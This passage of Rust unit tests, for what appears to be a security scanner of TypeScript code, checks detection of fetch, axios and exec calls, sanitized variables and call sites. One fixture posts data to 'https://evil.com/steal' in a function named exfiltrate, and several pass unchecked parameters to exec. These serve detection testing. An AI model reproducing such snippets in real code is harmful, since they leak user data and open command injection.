            ArgumentSource::Parameter { .. }
        ));
    }

    /// Parameters of an arrow function are recognised as parameters too.
    #[test]
    fn detects_arrow_function_params() {
        let parsed = parse_ts(
            "test.ts",
            r#"
const handler = async (url: string) => {
    const resp = await fetch(url);
    return resp.text();
};
"#,
        );
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// `axios.post` with a body is flagged as sending data.
    #[test]
    fn detects_axios_post() {
        let parsed = parse_ts(
            "test.ts",
            r#"
async function exfiltrate(data: string) {
    await axios.post("https://evil.com/steal", { body: data });
}
"#,
        );
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(parsed.network_operations[0].sends_data);
    }

    // ── Tests requiring tree-sitter AST (multi-line, TSX, accurate positions) ──

    /// An `exec` call spread over several lines is still one command.
    #[cfg(feature = "typescript")]
    #[test]
    fn detects_multiline_exec_call() {
        let parsed = parse_ts(
            "test.ts",
            r#"
function runCommand(command: string) {
    exec(
        command,
        { encoding: "utf-8" }
    );
}
"#,
        );
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A `fetch` call spread over several lines keeps its parameter URL.
    #[cfg(feature = "typescript")]
    #[test]
    fn detects_multiline_fetch() {
        let parsed = parse_ts(
            "test.ts",
            r#"
async function sendData(url: string) {
    const resp = await fetch(
        url,
        {
            method: "POST",
            body: JSON.stringify({ key: "value" }),
        }
    );
    return resp.json();
}
"#,
        );
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// `exec` inside a nested callback still sees the outer function's parameter.
    #[cfg(feature = "typescript")]
    #[test]
    fn detects_nested_callback_exec() {
        let parsed = parse_ts(
            "test.ts",
            r#"
function runCommand(command: string): Promise<string> {
    return new Promise((resolve, reject) => {
        exec(command, (error, stdout) => {
            if (error) reject(error);
            resolve(stdout);
        });
    });
}
"#,
        );
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// Reported locations use 1-based line numbers of the source text.
    #[cfg(feature = "typescript")]
    #[test]
    fn accurate_line_numbers() {
        let parsed = parse_ts(
            "test.ts",
            r#"
// line 2
// line 3
function dangerous(cmd: string) {
    exec(cmd);
}
"#,
        );
        assert_eq!(parsed.commands.len(), 1);
        // exec(cmd) is on line 5
        assert_eq!(parsed.commands[0].location.line, 5);
    }

    /// A `.tsx` file with JSX and destructured props parses and yields the fetch.
    #[cfg(feature = "typescript")]
    #[test]
    fn handles_tsx_file() {
        let parsed = parse_ts(
            "component.tsx",
            r#"
import React from "react";

const Component = ({ url }: { url: string }) => {
    const data = fetch(url);
    return <div>{data}</div>;
};
"#,
        );
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    // ── Cross-file support tests ──

    /// Function definitions are collected with their export flag and parameters.
    #[test]
    fn extracts_function_defs() {
        let parsed = parse_ts(
            "lib.ts",
            r#"
export async function readFileContent(filePath: string) {
    return fs.readFile(filePath, "utf-8");
}

function internalHelper(x: number) {
    return x + 1;
}
"#,
        );
        assert!(parsed.function_defs.len() >= 2);

        let exported = parsed
            .function_defs
            .iter()
            .find(|d| d.name == "readFileContent");
        assert!(exported.is_some());
        let exported = exported.unwrap();
        assert!(exported.is_exported);
        assert_eq!(exported.params, vec!["filePath"]);

        let internal = parsed
            .function_defs
            .iter()
            .find(|d| d.name == "internalHelper");
        assert!(internal.is_some());
        let internal = internal.unwrap();
        assert!(!internal.is_exported);
    }

    /// Calls to user-defined functions are collected as call sites.
    #[test]
    fn extracts_call_sites() {
        let parsed = parse_ts("index.ts", SANITIZED_HANDLER);
        assert!(!parsed.call_sites.is_empty());

        let rfc_call = parsed
            .call_sites
            .iter()
            .find(|cs| cs.callee == "readFileContent");
        assert!(rfc_call.is_some(), "Should find readFileContent call site");
    }

    /// A variable assigned from a sanitizer call is tracked and propagates to later calls.
    #[test]
    fn detects_sanitizer_assignment() {
        let parsed = parse_ts("index.ts", SANITIZED_HANDLER);
        assert!(parsed.sanitized_vars.contains("validPath"));

        // The call to readFileContent(validPath) should classify validPath as Sanitized
        let rfc_call = parsed
            .call_sites
            .iter()
            .find(|cs| cs.callee == "readFileContent");
        assert!(rfc_call.is_some());
        let rfc = rfc_call.unwrap();
        assert!(!rfc.arguments.is_empty());
        assert!(
            matches!(&rfc.arguments[0], ArgumentSource::Sanitized { .. }),
            "validPath should be classified as Sanitized, got: {:?}",
            rfc.arguments[0]
        );
    }

    /// The result of `path.resolve(...)` is tracked as a sanitized variable.
    #[test]
    fn sanitized_var_from_path_resolve() {
        let parsed = parse_ts(
            "test.ts",
            r#"
function processFile(rawPath: string) {
    const safePath = path.resolve(rawPath);
    fs.readFileSync(safePath, "utf-8");
}
"#,
        );
        assert!(parsed.sanitized_vars.contains("safePath"));
    }
}